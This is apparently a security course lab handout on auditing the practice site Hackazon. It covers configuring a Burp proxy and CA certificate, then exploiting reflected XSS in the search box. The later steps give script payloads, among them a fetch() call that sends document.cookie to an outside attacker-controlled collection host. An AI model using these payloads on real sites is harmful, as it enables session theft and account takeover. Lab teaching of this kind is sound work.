W 230: Manual Audit of Hackazon (10 pts)

What You Need

Purpose

To practice finding and exploiting several common Web vulnerabilities. I am following this blog.

1. Burp Setup

Configuring the Burp Proxy

Start Burp. On the Proxy tab, on the Intercept sub-tab, turn off Intercept.

On the Options sub-tab, make sure the proxy is listening on 127.0.0.1:8080 as shown below.

Configuring a Firefox Proxy

In Firefox, at the top right, click the three-bar "hamburger" icon and click Preferences.

In Preferences, search for proxy. Click the Settings... button.

Configure Firefox to use the 127.0.0.1 proxy on port 8080 for all protocols, as shown below.

Loading an HTTP Web Page

In Firefox, go to

http://ad.samsclass.info/

On the "HTTP history" sub-tab, you should see a request to http://ad.samsclass.info, as shown below.

Downloading the Burp Certificate

In Firefox, go to

http://burp

At the top right, click "CA Certificate", as shown below.

Save the certificate in your Downloads folder.

Installing the Certificate in Firefox

In Firefox Preferences, search for certificate. Click the "View Certificates..." button.

In the Certificate Manager box, click the Import... button.

Navigate to the certificate you downloaded, as shown below, and double-click it.

A box pops up, as shown below. Click "Trust this CA to verify websites" and click OK.

In the Certificate Manager box, click OK.

Loading an HTTPS Web Page

In Firefox, go to

https://hackazons.samsclass.info/

On the "HTTP history" sub-tab, you should see an HTTPS request. Click it.

In the lower pane, on the Request tab, on the Params sub-tab, you should see a PHPSESSID cookie value, as shown below.

2. Reflected XSS in Search Function

User Input Handling

In Firefox, go to

https://hackazons.samsclass.info/

Search for

shoes
No results are found, but the query "shoes" appears in the results page, as shown below.

When data from the user is echoed back on a Web page, if it's not sanitized, it can contain scripts, causesing a reflected XSS vulnerability.

Simple Proof-of-Concept

To test for that, search for
shoes<script>alert(1);</script>
An alert box pops up, as shown below.

Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.

Revealing a Cookie

Search for
shoes<script>alert(document.cookie);</script>
An alert box pops up, showing cookie values, as shown below. as shown below.

Viewing a Product

In the Hackazon page, click OK to close the pop-up box.

At the top left, click the red HACKAZON logo to return to the home page.

Click a product to view it, as shown below.

Flag M 230.1: Stealing Cookies (10 pts)

In the Hackazon page, search for
<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>

In a browser, go to:

https://attack32.samsclass.info/tmp/data.txt

Your stolen cookie appears at the end of the list.

The flag is covered by a green box in the image below.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image of Firefox showing the flag.

Save the image as "Proj W 230.1 from YOUR NAME".

Turning In Your Project

Email the images to cnit.129s@gmail.com with a subject of "W 230 from YOUR NAME".

Sources

Hacking Hackazon

Posted 2-6-2020